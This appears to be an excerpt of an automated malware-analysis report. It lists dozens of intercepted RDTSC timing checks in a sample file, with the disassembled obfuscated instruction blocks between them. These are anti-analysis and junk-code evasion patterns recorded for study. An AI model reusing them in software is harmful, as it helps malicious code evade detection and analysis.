Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F00B8 second address: 52F00C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push edx 0x0000000d pop ecx 0x0000000e push ebx 0x0000000f pop esi 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F00C9 second address: 52F0160 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F620450A758h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d movzx esi, bx 0x00000010 pushfd 0x00000011 jmp 00007F620450A753h 0x00000016 xor eax, 5CD5822Eh 0x0000001c jmp 00007F620450A759h 0x00000021 popfd 0x00000022 popad 0x00000023 mov ebp, esp 0x00000025 jmp 00007F620450A74Eh 0x0000002a push dword ptr [ebp+04h] 0x0000002d jmp 00007F620450A750h 0x00000032 push dword ptr [ebp+0Ch] 0x00000035 jmp 00007F620450A750h 0x0000003a push dword ptr [ebp+08h] 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 popad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F0160 second address: 52F0166 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5310AE3 second address: 5310AE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5310AE7 second address: 5310AFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6204BE6483h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5310AFE second address: 5310B3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F620450A74Fh 0x00000009 adc ah, 0000001Eh 0x0000000c jmp 00007F620450A759h 0x00000011 popfd 0x00000012 mov dx, si 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5310B3B second address: 5310B4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6204BE647Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5310B4A second address: 5310B80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F620450A759h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F620450A751h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5310B80 second address: 5310B84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5310B84 second address: 5310B8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5310803 second address: 5310809 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5310809 second address: 531082D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F620450A74Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F620450A74Dh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 531082D second address: 5310833 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5310833 second address: 5310837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 531069F second address: 53106C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6204BE6489h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53106C3 second address: 53106C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53106C7 second address: 53106DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6204BE647Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53103ED second address: 53103F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53103F1 second address: 53103F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53103F5 second address: 53103FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53103FB second address: 5310458 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 6C739E45h 0x00000008 jmp 00007F6204BE6482h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], ebp 0x00000013 jmp 00007F6204BE6480h 0x00000018 mov ebp, esp 0x0000001a pushad 0x0000001b mov ecx, 0C9211DDh 0x00000020 jmp 00007F6204BE647Ah 0x00000025 popad 0x00000026 pop ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F6204BE6487h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53200CC second address: 53200FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 movsx edi, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F620450A752h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F620450A74Eh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53200FB second address: 5320122 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6204BE647Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6204BE6485h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5320122 second address: 5320187 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 pushfd 0x00000006 jmp 00007F620450A753h 0x0000000b sub ch, 0000000Eh 0x0000000e jmp 00007F620450A759h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov ebp, esp 0x00000019 pushad 0x0000001a push ecx 0x0000001b mov dx, C36Eh 0x0000001f pop ebx 0x00000020 mov ecx, 65D1182Bh 0x00000025 popad 0x00000026 pop ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F620450A758h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5320187 second address: 5320196 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6204BE647Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53508E3 second address: 5350940 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F620450A74Dh 0x0000000b popad 0x0000000c xchg eax, ebp 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F620450A74Ch 0x00000014 jmp 00007F620450A755h 0x00000019 popfd 0x0000001a jmp 00007F620450A750h 0x0000001f popad 0x00000020 push eax 0x00000021 jmp 00007F620450A74Bh 0x00000026 xchg eax, ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5350940 second address: 5350946 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5350946 second address: 535095A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F620450A74Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 535095A second address: 5350987 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, si 0x00000007 popad 0x00000008 pushad 0x00000009 mov si, F5DBh 0x0000000d push ecx 0x0000000e pop edx 0x0000000f popad 0x00000010 popad 0x00000011 pop ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F6204BE6489h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5350987 second address: 5350997 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F620450A74Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5330289 second address: 533028E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 533028E second address: 53302E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edx, 439682E6h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d jmp 00007F620450A74Dh 0x00000012 mov ebp, esp 0x00000014 jmp 00007F620450A74Eh 0x00000019 mov eax, dword ptr [ebp+08h] 0x0000001c jmp 00007F620450A750h 0x00000021 and dword ptr [eax], 00000000h 0x00000024 pushad 0x00000025 mov esi, 386F17CDh 0x0000002a mov ah, 63h 0x0000002c popad 0x0000002d and dword ptr [eax+04h], 00000000h 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53105A2 second address: 53105A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53105A8 second address: 53105BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, si 0x00000006 mov si, 137Bh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53105BC second address: 53105D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6204BE6486h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53105D6 second address: 531061B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F620450A74Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F620450A756h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov bl, BCh 0x00000016 call 00007F620450A756h 0x0000001b pop ecx 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 531061B second address: 531063E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6204BE6480h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6204BE647Ah 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 531063E second address: 5310642 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5310642 second address: 5310648 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5320D9F second address: 5320DBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F620450A759h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5320DBC second address: 5320DF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F6204BE647Dh 0x0000000b adc al, FFFFFFA6h 0x0000000e jmp 00007F6204BE6481h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F6204BE647Dh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5320DF7 second address: 5320E86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F620450A757h 0x00000009 sbb si, 698Eh 0x0000000e jmp 00007F620450A759h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F620450A750h 0x0000001a sub eax, 3DC37C08h 0x00000020 jmp 00007F620450A74Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 push eax 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d pushfd 0x0000002e jmp 00007F620450A755h 0x00000033 xor ah, 00000026h 0x00000036 jmp 00007F620450A751h 0x0000003b popfd 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5320E86 second address: 5320EDE instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F6204BE6480h 0x00000008 add ax, 70C8h 0x0000000d jmp 00007F6204BE647Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 movzx ecx, dx 0x00000018 popad 0x00000019 xchg eax, ebp 0x0000001a jmp 00007F6204BE647Bh 0x0000001f mov ebp, esp 0x00000021 pushad 0x00000022 mov ax, dx 0x00000025 popad 0x00000026 pop ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F6204BE6488h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53300F1 second address: 533013D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F620450A751h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F620450A74Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F620450A74Ch 0x00000019 adc cx, 16C8h 0x0000001e jmp 00007F620450A74Bh 0x00000023 popfd 0x00000024 mov eax, 355E343Fh 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5350007 second address: 535000F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx edx, cx 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 535000F second address: 5350014 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5350014 second address: 5350072 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F6204BE647Fh 0x0000000a jmp 00007F6204BE6483h 0x0000000f popfd 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 xchg eax, ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 push edx 0x00000018 pop eax 0x00000019 pushfd 0x0000001a jmp 00007F6204BE6487h 0x0000001f jmp 00007F6204BE6483h 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5350072 second address: 5350078 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5350078 second address: 53500A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6204BE647Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6204BE6484h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53500A0 second address: 53500D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F620450A751h 0x00000009 or al, 00000046h 0x0000000c jmp 00007F620450A751h 0x00000011 popfd 0x00000012 mov dh, ch 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53500D6 second address: 53500DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53500DC second address: 5350128 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F620450A757h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov bl, cl 0x0000000e mov cx, di 0x00000011 popad 0x00000012 push edx 0x00000013 pushad 0x00000014 jmp 00007F620450A756h 0x00000019 popad 0x0000001a mov dword ptr [esp], ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F620450A74Ah 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5350258 second address: 5350326 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F6204BE6488h 0x00000008 xor esi, 30B49008h 0x0000000e jmp 00007F6204BE647Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push ecx 0x00000017 pushad 0x00000018 popad 0x00000019 pop edx 0x0000001a popad 0x0000001b pop eax 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F6204BE647Eh 0x00000023 sbb ax, B268h 0x00000028 jmp 00007F6204BE647Bh 0x0000002d popfd 0x0000002e mov cx, A05Fh 0x00000032 popad 0x00000033 ret 0x00000034 nop 0x00000035 push eax 0x00000036 call 00007F6209656663h 0x0000003b mov edi, edi 0x0000003d jmp 00007F6204BE6482h 0x00000042 xchg eax, ebp 0x00000043 pushad 0x00000044 pushfd 0x00000045 jmp 00007F6204BE647Eh 0x0000004a xor ax, AFF8h 0x0000004f jmp 00007F6204BE647Bh 0x00000054 popfd 0x00000055 pushfd 0x00000056 jmp 00007F6204BE6488h 0x0000005b xor cl, 00000058h 0x0000005e jmp 00007F6204BE647Bh 0x00000063 popfd 0x00000064 popad 0x00000065 push eax 0x00000066 pushad 0x00000067 call 00007F6204BE647Fh 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5350326 second address: 5350330 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 movsx edi, si 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5350330 second address: 535033F instructions: 0x00000000 rdtsc 0x00000002 mov bx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 535033F second address: 5350343 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5350343 second address: 5350347 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5350347 second address: 535034D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 535034D second address: 53503A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6204BE647Ah 0x00000009 or ah, 00000018h 0x0000000c jmp 00007F6204BE647Bh 0x00000011 popfd 0x00000012 mov dx, cx 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov ebp, esp 0x0000001a pushad 0x0000001b call 00007F6204BE6480h 0x00000020 jmp 00007F6204BE6482h 0x00000025 pop eax 0x00000026 mov edi, 6A32DB66h 0x0000002b popad 0x0000002c pop ebp 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 mov eax, ebx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53503A2 second address: 53503C1 instructions: 0x00000000 rdtsc 0x00000002 call 00007F620450A755h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c movsx ebx, ax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5300169 second address: 53001AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6204BE647Fh 0x00000009 or eax, 5304484Eh 0x0000000f jmp 00007F6204BE6489h 0x00000014 popfd 0x00000015 mov edx, esi 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ebx, dword ptr [ebp+10h] 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 mov ax, F3E5h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53001AB second address: 530021B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F620450A74Eh 0x0000000c or ecx, 347AEFF8h 0x00000012 jmp 00007F620450A74Bh 0x00000017 popfd 0x00000018 popad 0x00000019 xchg eax, esi 0x0000001a jmp 00007F620450A756h 0x0000001f push eax 0x00000020 pushad 0x00000021 mov edx, 0A213404h 0x00000026 mov bl, 8Ch 0x00000028 popad 0x00000029 xchg eax, esi 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F620450A752h 0x00000031 and ah, FFFFFFB8h 0x00000034 jmp 00007F620450A74Bh 0x00000039 popfd 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 530021B second address: 530026E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F6204BE6484h 0x0000000a add esi, 68A18F18h 0x00000010 jmp 00007F6204BE647Bh 0x00000015 popfd 0x00000016 popad 0x00000017 popad 0x00000018 mov esi, dword ptr [ebp+08h] 0x0000001b pushad 0x0000001c mov esi, 4A83C0EBh 0x00000021 mov di, si 0x00000024 popad 0x00000025 xchg eax, edi 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F6204BE6484h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 530026E second address: 5300274 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5300274 second address: 530027A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 530027A second address: 530027E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 530027E second address: 5300282 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5300282 second address: 53002B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F620450A74Fh 0x0000000e xchg eax, edi 0x0000000f pushad 0x00000010 jmp 00007F620450A754h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53002B4 second address: 53002DF instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F6204BE647Eh 0x00000008 xor ah, 00000068h 0x0000000b jmp 00007F6204BE647Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 test esi, esi 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53002DF second address: 53002E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53002E3 second address: 53002E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53002E7 second address: 53002ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53002ED second address: 5300336 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6204BE6488h 0x00000009 adc eax, 31F502F8h 0x0000000f jmp 00007F6204BE647Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 je 00007F627680476Dh 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F6204BE6480h 0x00000025 rdtsc
